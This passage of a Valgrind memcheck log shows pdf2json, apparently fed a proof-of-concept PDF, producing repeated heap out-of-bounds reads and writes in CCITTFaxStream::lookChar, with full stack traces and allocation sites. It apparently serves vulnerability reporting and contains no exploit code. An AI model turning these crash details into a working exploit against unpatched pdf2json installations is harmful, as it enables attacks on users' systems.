/home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x43FA44: XRef::fetch(int, int, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x4284A9: Object::fetch(XRef*, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42A565: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== ==15436== Invalid write of size 2 ==15436== at 0x431556: CCITTFaxStream::lookChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x43ADDC: CCITTFaxStream::getChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x40947A: Object::streamGetChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x48796F: Lexer::getChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x4884FD: Lexer::getObj(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x489C19: Parser::shift() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x489825: Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x454759: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42BCBD: PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== Address 0x5b100be is 2 bytes after a block of size 108 alloc'd ==15436== at 0x4C2DB8F: malloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==15436== by 0x48E521: gmalloc (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x48E667: gmallocn (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x43051F: CCITTFaxStream::CCITTFaxStream(Stream*, int, int, int, int, int, int, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42CE76: Stream::makeFilter(char*, Stream*, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42C6AF: Stream::addFilters(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x489AFF: Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x489549: Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x43FA44: XRef::fetch(int, int, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x4284A9: Object::fetch(XRef*, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42A565: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== ==15436== Invalid read of size 2 ==15436== at 0x431581: CCITTFaxStream::lookChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x43ADDC: CCITTFaxStream::getChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x40947A: Object::streamGetChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x48796F: Lexer::getChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x4884FD: Lexer::getObj(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x489C19: Parser::shift() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x489825: Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x454759: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42BCBD: PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== Address 0x5b100be is 2 bytes after a block of size 108 alloc'd ==15436== at 0x4C2DB8F: malloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==15436== by 0x48E521: gmalloc (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x48E667: gmallocn (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x43051F: CCITTFaxStream::CCITTFaxStream(Stream*, int, int, int, int, int, int, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42CE76: Stream::makeFilter(char*, Stream*, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42C6AF: Stream::addFilters(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x489AFF: Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x489549: Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x43FA44: XRef::fetch(int, int, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x4284A9: Object::fetch(XRef*, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42A565: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== ==15436== Invalid read of size 2 ==15436== at 0x4315F5: CCITTFaxStream::lookChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x43ADDC: CCITTFaxStream::getChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x40947A: Object::streamGetChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x48796F: Lexer::getChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x4884FD: Lexer::getObj(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x489C19: Parser::shift() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x489825: Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x454759: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42BCBD: PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== Address 0x5b100be is 2 bytes after a block of size 108 alloc'd ==15436== at 0x4C2DB8F: malloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==15436== by 0x48E521: gmalloc (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x48E667: gmallocn (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x43051F: CCITTFaxStream::CCITTFaxStream(Stream*, int, int, int, int, int, int, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42CE76: Stream::makeFilter(char*, Stream*, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42C6AF: Stream::addFilters(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x489AFF: Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x489549: Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x43FA44: XRef::fetch(int, int, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x4284A9: Object::fetch(XRef*, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42A565: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== Error (5428): Bad white code (000b) in CCITTFax stream ==15436== Invalid read of size 2 ==15436== at 0x43165C: CCITTFaxStream::lookChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x43ADDC: CCITTFaxStream::getChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x40947A: Object::streamGetChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x48796F: Lexer::getChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x4884FD: Lexer::getObj(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x489C19: Parser::shift() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x489825: Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x454759: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42BCBD: PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== Address 0x5b1040a is 22 bytes before a block of size 8 alloc'd ==15436== at 0x4C2E0EF: operator new(unsigned long) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==15436== by 0x40A204: GfxDeviceGrayColorSpace::copy() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x41AF23: GfxState::GfxState(GfxState*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x41CDB8: GfxState::copy() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x41C749: GfxState::save() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x467BC1: Gfx::saveState() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42A586: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42BCBD: PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42BD48: PDFDoc::displayPages(OutputDev*, int, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x40269A: main (pdf2json.cc:275) ==15436== ==15436== Invalid read of size 2 ==15436== at 0x431688: CCITTFaxStream::lookChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x43ADDC: CCITTFaxStream::getChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x40947A: Object::streamGetChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x48796F: Lexer::getChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x4884FD: Lexer::getObj(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x489C19: Parser::shift() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x489825: Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x454759: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42BCBD: PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== Address 0x5b1040a is 22 bytes before a block of size 8 alloc'd ==15436== at 0x4C2E0EF: operator new(unsigned long) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==15436== by 0x40A204: GfxDeviceGrayColorSpace::copy() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x41AF23: GfxState::GfxState(GfxState*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x41CDB8: GfxState::copy() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x41C749: GfxState::save() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x467BC1: Gfx::saveState() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42A586: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42BCBD: PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42BD48: PDFDoc::displayPages(OutputDev*, int, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x40269A: main (pdf2json.cc:275) ==15436== Error (5585): CCITTFax row is wrong length (101) ==15436== Invalid read of size 2 ==15436== at 0x4316CF: CCITTFaxStream::lookChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x43ADDC: CCITTFaxStream::getChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x40947A: Object::streamGetChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x48796F: Lexer::getChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x4884FD: Lexer::getObj(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x489C19: Parser::shift() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x489825: Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x454759: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42BCBD: PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== Address 0x5b1040a is 22 bytes before a block of size 8 alloc'd ==15436== at 0x4C2E0EF: operator new(unsigned long) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==15436== by 0x40A204: GfxDeviceGrayColorSpace::copy() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x41AF23: GfxState::GfxState(GfxState*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x41CDB8: GfxState::copy() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x41C749: GfxState::save() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x467BC1: Gfx::saveState() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42A586: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42BCBD: PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42BD48: PDFDoc::displayPages(OutputDev*, int, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x40269A: main (pdf2json.cc:275) ==15436== ==15436== Invalid write of size 2 ==15436== at 0x431722: CCITTFaxStream::lookChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x43ADDC: CCITTFaxStream::getChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x40947A: Object::streamGetChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x48796F: Lexer::getChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x4884FD: Lexer::getObj(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x489C19: Parser::shift() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x489825: Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x454759: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42BCBD: PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== Address 0x5b1040a is 22 bytes before a block of size 8 alloc'd ==15436== at 0x4C2E0EF: operator new(unsigned long) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==15436== by 0x40A204: GfxDeviceGrayColorSpace::copy() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x41AF23: GfxState::GfxState(GfxState*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x41CDB8: GfxState::copy() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x41C749: GfxState::save() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x467BC1: Gfx::saveState() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42A586: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42BCBD: PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42BD48: PDFDoc::displayPages(OutputDev*, int, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x40269A: main (pdf2json.cc:275) ==15436== ==15436== Invalid read of size 2 ==15436== at 0x431C78: CCITTFaxStream::lookChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x43ADDC: CCITTFaxStream::getChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x40947A: Object::streamGetChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x48796F: Lexer::getChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x4884FD: Lexer::getObj(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x489C19: Parser::shift() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x489825: Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x454759: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42BCBD: PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== Address 0x5b100bc is 0 bytes after a block of size 108 alloc'd ==15436== at 0x4C2DB8F: malloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==15436== by 0x48E521: gmalloc (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x48E667: gmallocn (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x43051F: CCITTFaxStream::CCITTFaxStream(Stream*, int, int, int, int, int, int, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42CE76: Stream::makeFilter(char*, Stream*, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42C6AF: Stream::addFilters(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x489AFF: Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x489549: Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x43FA44: XRef::fetch(int, int, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x4284A9: Object::fetch(XRef*, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42A565: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== ==15436== Invalid read of size 2 ==15436== at 0x431C4C: CCITTFaxStream::lookChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x43ADDC: CCITTFaxStream::getChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x40947A: Object::streamGetChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x48796F: Lexer::getChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x4884FD: Lexer::getObj(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x489C19: Parser::shift() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x489825: Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x454759: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42BCBD: PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== Address 0x5b100bc is 0 bytes after a block of size 108 alloc'd ==15436== at 